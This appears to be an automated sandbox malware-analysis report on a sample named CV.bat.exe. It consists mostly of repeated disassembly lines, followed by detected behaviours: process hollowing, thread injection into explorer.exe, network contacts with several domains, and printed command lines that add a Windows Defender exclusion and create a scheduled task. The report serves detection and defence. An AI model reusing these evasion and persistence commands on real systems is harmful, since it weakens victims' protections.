Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]	8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]	8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]	8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h]	8_2_012C7016
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h]	8_2_012C7016
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h]	8_2_012C7016
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h]	8_2_0131740D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h]	8_2_0131740D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h]	8_2_0131740D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01302073 mov eax, dword ptr fs:[00000030h]	8_2_01302073
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01311074 mov eax, dword ptr fs:[00000030h]	8_2_01311074
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126746D mov eax, dword ptr fs:[00000030h]	8_2_0126746D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A44B mov eax, dword ptr fs:[00000030h]	8_2_0127A44B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01260050 mov eax, dword ptr fs:[00000030h]	8_2_01260050
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01260050 mov eax, dword ptr fs:[00000030h]	8_2_01260050
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DC450 mov eax, dword ptr fs:[00000030h]	8_2_012DC450
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DC450 mov eax, dword ptr fs:[00000030h]	8_2_012DC450
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012890AF mov eax, dword ptr fs:[00000030h]	8_2_012890AF
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127F0BF mov ecx, dword ptr fs:[00000030h]	8_2_0127F0BF
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127F0BF mov eax, dword ptr fs:[00000030h]	8_2_0127F0BF
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127F0BF mov eax, dword ptr fs:[00000030h]	8_2_0127F0BF
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249080 mov eax, dword ptr fs:[00000030h]	8_2_01249080
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C3884 mov eax, dword ptr fs:[00000030h]	8_2_012C3884
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C3884 mov eax, dword ptr fs:[00000030h]	8_2_012C3884
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125849B mov eax, dword ptr fs:[00000030h]	8_2_0125849B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012458EC mov eax, dword ptr fs:[00000030h]	8_2_012458EC
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013014FB mov eax, dword ptr fs:[00000030h]	8_2_013014FB
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	8_2_012C6CF0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	8_2_012C6CF0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	8_2_012C6CF0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318CD6 mov eax, dword ptr fs:[00000030h]	8_2_01318CD6
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov ecx, dword ptr fs:[00000030h]	8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01244F2E mov eax, dword ptr fs:[00000030h]	8_2_01244F2E
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01244F2E mov eax, dword ptr fs:[00000030h]	8_2_01244F2E
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127E730 mov eax, dword ptr fs:[00000030h]	8_2_0127E730
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A70E mov eax, dword ptr fs:[00000030h]	8_2_0127A70E
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A70E mov eax, dword ptr fs:[00000030h]	8_2_0127A70E
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130131B mov eax, dword ptr fs:[00000030h]	8_2_0130131B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126F716 mov eax, dword ptr fs:[00000030h]	8_2_0126F716
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131070D mov eax, dword ptr fs:[00000030h]	8_2_0131070D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131070D mov eax, dword ptr fs:[00000030h]	8_2_0131070D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DFF10 mov eax, dword ptr fs:[00000030h]	8_2_012DFF10
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DFF10 mov eax, dword ptr fs:[00000030h]	8_2_012DFF10
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124DB60 mov ecx, dword ptr fs:[00000030h]	8_2_0124DB60
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125FF60 mov eax, dword ptr fs:[00000030h]	8_2_0125FF60
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318F6A mov eax, dword ptr fs:[00000030h]	8_2_01318F6A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01273B7A mov eax, dword ptr fs:[00000030h]	8_2_01273B7A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01273B7A mov eax, dword ptr fs:[00000030h]	8_2_01273B7A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124DB40 mov eax, dword ptr fs:[00000030h]	8_2_0124DB40
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125EF40 mov eax, dword ptr fs:[00000030h]	8_2_0125EF40
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318B58 mov eax, dword ptr fs:[00000030h]	8_2_01318B58
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124F358 mov eax, dword ptr fs:[00000030h]	8_2_0124F358
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h]	8_2_01274BAD
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h]	8_2_01274BAD
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h]	8_2_01274BAD
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01315BA5 mov eax, dword ptr fs:[00000030h]	8_2_01315BA5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01251B8F mov eax, dword ptr fs:[00000030h]	8_2_01251B8F
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01251B8F mov eax, dword ptr fs:[00000030h]	8_2_01251B8F
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FD380 mov ecx, dword ptr fs:[00000030h]	8_2_012FD380
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272397 mov eax, dword ptr fs:[00000030h]	8_2_01272397
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01258794 mov eax, dword ptr fs:[00000030h]	8_2_01258794
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127B390 mov eax, dword ptr fs:[00000030h]	8_2_0127B390
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h]	8_2_012C7794
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h]	8_2_012C7794
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h]	8_2_012C7794
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130138A mov eax, dword ptr fs:[00000030h]	8_2_0130138A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]	8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]	8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]	8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]	8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]	8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]	8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126DBE9 mov eax, dword ptr fs:[00000030h]	8_2_0126DBE9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012837F5 mov eax, dword ptr fs:[00000030h]	8_2_012837F5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C53CA mov eax, dword ptr fs:[00000030h]	8_2_012C53CA
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C53CA mov eax, dword ptr fs:[00000030h]	8_2_012C53CA
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124E620 mov eax, dword ptr fs:[00000030h]	8_2_0124E620
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01284A2C mov eax, dword ptr fs:[00000030h]	8_2_01284A2C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01284A2C mov eax, dword ptr fs:[00000030h]	8_2_01284A2C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FFE3F mov eax, dword ptr fs:[00000030h]	8_2_012FFE3F
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h]	8_2_0124C600
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h]	8_2_0124C600
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h]	8_2_0124C600
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01278E00 mov eax, dword ptr fs:[00000030h]	8_2_01278E00
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01258A0A mov eax, dword ptr fs:[00000030h]	8_2_01258A0A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124AA16 mov eax, dword ptr fs:[00000030h]	8_2_0124AA16
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124AA16 mov eax, dword ptr fs:[00000030h]	8_2_0124AA16
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h]	8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov ecx, dword ptr fs:[00000030h]	8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h]	8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h]	8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301608 mov eax, dword ptr fs:[00000030h]	8_2_01301608
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01263A1C mov eax, dword ptr fs:[00000030h]	8_2_01263A1C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A61C mov eax, dword ptr fs:[00000030h]	8_2_0127A61C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A61C mov eax, dword ptr fs:[00000030h]	8_2_0127A61C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125766D mov eax, dword ptr fs:[00000030h]	8_2_0125766D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FB260 mov eax, dword ptr fs:[00000030h]	8_2_012FB260
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FB260 mov eax, dword ptr fs:[00000030h]	8_2_012FB260
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128927A mov eax, dword ptr fs:[00000030h]	8_2_0128927A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318A62 mov eax, dword ptr fs:[00000030h]	8_2_01318A62
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]	8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]	8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]	8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]	8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]	8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]	8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]	8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]	8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]	8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]	8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]	8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]	8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]	8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]	8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]	8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130EA55 mov eax, dword ptr fs:[00000030h]	8_2_0130EA55
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130AE44 mov eax, dword ptr fs:[00000030h]	8_2_0130AE44
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130AE44 mov eax, dword ptr fs:[00000030h]	8_2_0130AE44
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012D4257 mov eax, dword ptr fs:[00000030h]	8_2_012D4257
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]	8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]	8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]	8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]	8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]	8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C46A7 mov eax, dword ptr fs:[00000030h]	8_2_012C46A7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h]	8_2_01310EA5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h]	8_2_01310EA5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h]	8_2_01310EA5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125AAB0 mov eax, dword ptr fs:[00000030h]	8_2_0125AAB0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125AAB0 mov eax, dword ptr fs:[00000030h]	8_2_0125AAB0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127FAB0 mov eax, dword ptr fs:[00000030h]	8_2_0127FAB0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DFE87 mov eax, dword ptr fs:[00000030h]	8_2_012DFE87
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127D294 mov eax, dword ptr fs:[00000030h]	8_2_0127D294
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127D294 mov eax, dword ptr fs:[00000030h]	8_2_0127D294
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272AE4 mov eax, dword ptr fs:[00000030h]	8_2_01272AE4
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012716E0 mov ecx, dword ptr fs:[00000030h]	8_2_012716E0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012576E2 mov eax, dword ptr fs:[00000030h]	8_2_012576E2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318ED6 mov eax, dword ptr fs:[00000030h]	8_2_01318ED6
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012736CC mov eax, dword ptr fs:[00000030h]	8_2_012736CC
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272ACB mov eax, dword ptr fs:[00000030h]	8_2_01272ACB
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FFEC0 mov eax, dword ptr fs:[00000030h]	8_2_012FFEC0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01288EC7 mov eax, dword ptr fs:[00000030h]	8_2_01288EC7

Source: C:\Users\user\Desktop\CV.bat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: 8_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,

8_2_01289910

Source: C:\Users\user\Desktop\CV.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.hipnoterapia.store
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 63.141.242.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yaignars.site
Source: C:\Windows\explorer.exe	Domain query: www.miarizzuto.org

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\CV.bat.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1200000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CV.bat.exe

Memory written: C:\Users\user\Desktop\CV.bat.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\CV.bat.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\CV.bat.exe	Thread register set: target process: 3452			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3452			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe			Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe	Jump to behavior

Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.371469343.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.357133629.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.388287354.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.305607182.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Users\user\Desktop\CV.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
